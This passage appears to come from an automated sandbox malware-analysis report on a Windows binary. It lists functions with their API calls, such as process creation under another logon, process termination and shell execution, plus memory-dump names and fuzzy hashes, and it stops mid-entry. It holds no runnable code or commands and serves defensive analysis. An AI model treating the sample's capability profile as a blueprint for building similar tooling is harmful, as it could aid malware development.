                                                        • Opcode ID: c61bd73804ecf7ce19e62cd071492f4610f3b8062f836e826b7c346a8977d2ab
                                                        • Instruction ID: bc2816b44e265b7a4f4087f47d7060a0171ff91a13151870123581f07c97d380
                                                        • Opcode Fuzzy Hash: c61bd73804ecf7ce19e62cd071492f4610f3b8062f836e826b7c346a8977d2ab
                                                        • Instruction Fuzzy Hash: 4911B131505205FFDB109FA9CC89BAE7BB9EB4B35AF204959F845B7110C7359948CB60
                                                        Function 00E514CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E514FF
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00E51506
                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E51515
                                                        • CloseHandle.KERNEL32(00000004), ref: 00E51520
                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E5154F
                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00E51563
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                        • String ID:
                                                        • API String ID: 1413079979-0
                                                        • Opcode ID: 8d00bea9531119a488aa373560989230edccaa960d2a7555b4fc36b2fa132f66
                                                        • Instruction ID: 4ad709185c8a57c5adf80cb52757e7d7d87e96c7c0f08d80370ce173a21504a3
                                                        • Opcode Fuzzy Hash: 8d00bea9531119a488aa373560989230edccaa960d2a7555b4fc36b2fa132f66
                                                        • Instruction Fuzzy Hash: 3E118C72100209AFDF118FA4DD09FDE3BA9EF49749F144055FE05B2060D3758E69EB61
                                                        Function 00E13382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,00E13379,00E12FE5), ref: 00E13390
                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E1339E
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E133B7
                                                        • SetLastError.KERNEL32(00000000,?,00E13379,00E12FE5), ref: 00E13409
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastValue___vcrt_
                                                        • String ID:
                                                        • API String ID: 3852720340-0
                                                        • Opcode ID: d7d67b0b92c67acbb13d84d9adf819dd08a54e817d53307f1dbe4b0356645bb0
                                                        • Instruction ID: 036d2c54c08d68eea2d1e0bc709d746b940b7dff16e3a0402999154a3f2a4459
                                                        • Opcode Fuzzy Hash: d7d67b0b92c67acbb13d84d9adf819dd08a54e817d53307f1dbe4b0356645bb0
                                                        • Instruction Fuzzy Hash: 1901243270C311BEAA243B767C855EB2A94EB05379330233AF430B42F0EF114E8A5658
                                                        Function 00E22D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,00E25686,00E33CD6,?,00000000,?,00E25B6A,?,?,?,?,?,00E1E6D1,?,00EB8A48), ref: 00E22D78
                                                        • _free.LIBCMT ref: 00E22DAB
                                                        • _free.LIBCMT ref: 00E22DD3
                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,00E1E6D1,?,00EB8A48,00000010,00DF4F4A,?,?,00000000,00E33CD6), ref: 00E22DE0
                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,00E1E6D1,?,00EB8A48,00000010,00DF4F4A,?,?,00000000,00E33CD6), ref: 00E22DEC
                                                        • _abort.LIBCMT ref: 00E22DF2
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_free$_abort
                                                        • String ID:
                                                        • API String ID: 3160817290-0
                                                        • Opcode ID: a584a52da9444d1a58c462d7ae8c83f8d6f0304e84674226fc46b9f617172f12
                                                        • Instruction ID: daf55e87b2bbc72fb63f1ad073f30781c474802be184c39a204e4f2d693df4d7
                                                        • Opcode Fuzzy Hash: a584a52da9444d1a58c462d7ae8c83f8d6f0304e84674226fc46b9f617172f12
                                                        • Instruction Fuzzy Hash: 20F0C8365056307BC2122739BC06E5B26E9AFC27A5F34252CFA28B21E2EF348C464270
                                                        Function 00E88A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E09639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E09693
                                                          • Part of subcall function 00E09639: SelectObject.GDI32(?,00000000), ref: 00E096A2
                                                          • Part of subcall function 00E09639: BeginPath.GDI32(?), ref: 00E096B9
                                                          • Part of subcall function 00E09639: SelectObject.GDI32(?,00000000), ref: 00E096E2
                                                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00E88A4E
                                                        • LineTo.GDI32(?,00000003,00000000), ref: 00E88A62
                                                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00E88A70
                                                        • LineTo.GDI32(?,00000000,00000003), ref: 00E88A80
                                                        • EndPath.GDI32(?), ref: 00E88A90
                                                        • StrokePath.GDI32(?), ref: 00E88AA0
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                        • String ID:
                                                        • API String ID: 43455801-0
                                                        • Opcode ID: ea0956a20032a05231bece37678d64dc7c590dab61dffd69390e1167b4f99323
                                                        • Instruction ID: 0f18bcdc9a98b196d863c4bc84dd71d23d76a5c47f07c7665e1c98268bbf08ab
                                                        • Opcode Fuzzy Hash: ea0956a20032a05231bece37678d64dc7c590dab61dffd69390e1167b4f99323
                                                        • Instruction Fuzzy Hash: AF110C76000108FFDB119F91DC88E9A7F6DEB05394F108061BA19A91A1C7729D59DBA0
                                                        Function 00E551FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 00E55218
                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E55229
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E55230
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00E55238
                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E5524F
                                                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00E55261
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CapsDevice$Release
                                                        • String ID:
                                                        • API String ID: 1035833867-0
                                                        • Opcode ID: e035dffe7e4bfc4877f0298422a3746487d1439da08673f90f8dced757385a3a
                                                        • Instruction ID: dccd4ea230a2437caf17f7a3703762d603a6a8a11607eecaed83c1025160227a
                                                        • Opcode Fuzzy Hash: e035dffe7e4bfc4877f0298422a3746487d1439da08673f90f8dced757385a3a
                                                        • Instruction Fuzzy Hash: D0018F75A00708BFEB109BB69C49A4EBFB8EF49751F144066FA08F7290DA709804CBA0
                                                        Function 00DF1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DF1BF4
                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00DF1BFC
                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DF1C07
                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DF1C12
                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00DF1C1A
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DF1C22
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Virtual
                                                        • String ID:
                                                        • API String ID: 4278518827-0
                                                        • Opcode ID: dc5c807316efc7f7b360f58b35cedd1152678068d07d75c96eaf1b680099a5b0
                                                        • Instruction ID: 55de0f0855e758535df01ec82def5d8913666ec5018f47cc25edae2167ed11ba
                                                        • Opcode Fuzzy Hash: dc5c807316efc7f7b360f58b35cedd1152678068d07d75c96eaf1b680099a5b0
                                                        • Instruction Fuzzy Hash: E0016CB09027597DE3008F5A8C85B52FFA8FF19754F00411B915C47941C7F5A868CBE5
                                                        Function 00E5EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E5EB30
                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E5EB46
                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00E5EB55
                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E5EB64
                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E5EB6E
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E5EB75
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 839392675-0
                                                        • Opcode ID: 93a8d42393da78e60ea87d8b65cd1c51854d407d7e8d89e060b8297c2b5f70b3
                                                        • Instruction ID: 160413999c97f0e694af104070f7fb7889b69fb54673191c10c048edbc22a51a
                                                        • Opcode Fuzzy Hash: 93a8d42393da78e60ea87d8b65cd1c51854d407d7e8d89e060b8297c2b5f70b3
                                                        • Instruction Fuzzy Hash: 4DF06772201118BFE6205B639C0EEAB3A7CEBCBF11F100168FA05E1091E7B01A0997B5
                                                        Function 00E47439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClientRect.USER32(?), ref: 00E47452
                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00E47469
                                                        • GetWindowDC.USER32(?), ref: 00E47475
                                                        • GetPixel.GDI32(00000000,?,?), ref: 00E47484
                                                        • ReleaseDC.USER32(?,00000000), ref: 00E47496
                                                        • GetSysColor.USER32(00000005), ref: 00E474B0
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                        • String ID:
                                                        • API String ID: 272304278-0
                                                        • Opcode ID: aa44509cbabdcad3885c8a4cab4f174cdabbb16ce14ec801e2bd4a9643e920fd
                                                        • Instruction ID: b58d95e24b6526df8b8b95289f81a10abffe8410049d5bee662bafab82db82d2
                                                        • Opcode Fuzzy Hash: aa44509cbabdcad3885c8a4cab4f174cdabbb16ce14ec801e2bd4a9643e920fd
                                                        • Instruction Fuzzy Hash: 41018B31400215EFDB105FA5EC08BEA7BB6FF05721F210060F929B21A1CB311E45AB61
                                                        Function 00E51874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E5187F
                                                        • UnloadUserProfile.USERENV(?,?), ref: 00E5188B
                                                        • CloseHandle.KERNEL32(?), ref: 00E51894
                                                        • CloseHandle.KERNEL32(?), ref: 00E5189C
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00E518A5
                                                        • HeapFree.KERNEL32(00000000), ref: 00E518AC
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                        • String ID:
                                                        • API String ID: 146765662-0
                                                        • Opcode ID: 72adfe44542b85874e4f47af446bbc0abc1a2d71deb4ea5d784d3365c64bfdd8
                                                        • Instruction ID: 282f5cfbc662b3461772f3703a7da971c09ad3659819fbdc1a6a423151403380
                                                        • Opcode Fuzzy Hash: 72adfe44542b85874e4f47af446bbc0abc1a2d71deb4ea5d784d3365c64bfdd8
                                                        • Instruction Fuzzy Hash: 24E0E536004101BFDB015FA2ED0CD0ABF39FF4AB22B208221F229A1475CB329465EF60
                                                        Function 00DFBBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 00DFBEB3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Init_thread_footer
                                                        • String ID: D%$D%$D%$D%
                                                        • API String ID: 1385522511-2722557190
                                                        • Opcode ID: 0ec08d7a795dc8909c676676df0c024083e56c0d4fd4081be89a2f0b8d410221
                                                        • Instruction ID: ec5256aeabbc423e1f93ac036fa7d104b7c87cca225c84f6c212d9abdc4c2db0
                                                        • Opcode Fuzzy Hash: 0ec08d7a795dc8909c676676df0c024083e56c0d4fd4081be89a2f0b8d410221
                                                        • Instruction Fuzzy Hash: 80914E75A0020ADFCB14CF69C4906BAB7F1FF58320F25816EDA95AB350D771E981CBA1
                                                        Function 00E77B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E10242: EnterCriticalSection.KERNEL32(00EC070C,00EC1884,?,?,00E0198B,00EC2518,?,?,?,00DF12F9,00000000), ref: 00E1024D
                                                          • Part of subcall function 00E10242: LeaveCriticalSection.KERNEL32(00EC070C,?,00E0198B,00EC2518,?,?,?,00DF12F9,00000000), ref: 00E1028A
                                                          • Part of subcall function 00DF9CB3: _wcslen.LIBCMT ref: 00DF9CBD
                                                          • Part of subcall function 00E100A3: __onexit.LIBCMT ref: 00E100A9
                                                        • __Init_thread_footer.LIBCMT ref: 00E77BFB
                                                          • Part of subcall function 00E101F8: EnterCriticalSection.KERNEL32(00EC070C,?,?,00E08747,00EC2514), ref: 00E10202
                                                          • Part of subcall function 00E101F8: LeaveCriticalSection.KERNEL32(00EC070C,?,00E08747,00EC2514), ref: 00E10235
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                        • String ID: +T$5$G$Variable must be of type 'Object'.
                                                        • API String ID: 535116098-4125810065
                                                        • Opcode ID: c4ff235c395aad3abdb8d2f590beb5054bfbeea5b2a051cbe4ac0f0b81f41131
                                                        • Instruction ID: 3e335dff281b6640fddbfa8290126d41de7c1b334d3f445afc627af9a68044d9
                                                        • Opcode Fuzzy Hash: c4ff235c395aad3abdb8d2f590beb5054bfbeea5b2a051cbe4ac0f0b81f41131
                                                        • Instruction Fuzzy Hash: A5918970A04209AFCB14EF54D9919BDB7B1FF49304F10D059F98ABB292DB71AE81CB61
                                                        Function 00E5C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF7620: _wcslen.LIBCMT ref: 00DF7625
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E5C6EE
                                                        • _wcslen.LIBCMT ref: 00E5C735
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E5C79C
                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E5C7CA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info_wcslen$Default
                                                        • String ID: 0
                                                        • API String ID: 1227352736-4108050209
                                                        • Opcode ID: 6fc7620734c1ed4dc9270e6623ba48f338f292d0f6f1c9b13fafcb85a3d4aaec
                                                        • Instruction ID: 7d36a91f093cbd42e03c850017fdfc8d0fca5e91c8a27ad523f61e01dabc2b64
                                                        • Opcode Fuzzy Hash: 6fc7620734c1ed4dc9270e6623ba48f338f292d0f6f1c9b13fafcb85a3d4aaec
                                                        • Instruction Fuzzy Hash: 7A51F0716043009FC7149F38C8A5B6A77E4AB89719F242D2EFD95F35D0DB70D9488BA2
                                                        Function 00E7AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00E7AEA3
                                                          • Part of subcall function 00DF7620: _wcslen.LIBCMT ref: 00DF7625
                                                        • GetProcessId.KERNEL32(00000000), ref: 00E7AF38
                                                        • CloseHandle.KERNEL32(00000000), ref: 00E7AF67
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CloseExecuteHandleProcessShell_wcslen
                                                        • String ID: <$@
                                                        • API String ID: 146682121-1426351568
                                                        • Opcode ID: 8ba0372db872faac6f3c7951ebeec6882254f63da55f750d670dc5a157d7ff75
                                                        • Instruction ID: 6820616356d824479b546a1d6ce854c74fcc97f2f444ae8d012a719fb260b21b
                                                        • Opcode Fuzzy Hash: 8ba0372db872faac6f3c7951ebeec6882254f63da55f750d670dc5a157d7ff75
                                                        • Instruction Fuzzy Hash: 51713971A00619DFCB14DF54C484AAEBBF0EF48314F05C4A9E95AAB352C774ED85CBA1
                                                        Function 00E5719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E57206
                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E5723C
                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E5724D
                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E572CF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                        • String ID: DllGetClassObject
                                                        • API String ID: 753597075-1075368562
                                                        • Opcode ID: 42c2464d9fbd40dc4c53df3379381f8e69110f18e3ae061b661b46ebb5858e96
                                                        • Instruction ID: 499450696fb5976d95ad18022608112ec41ee8eb6f3d120c32d9fbe1bc0a0869
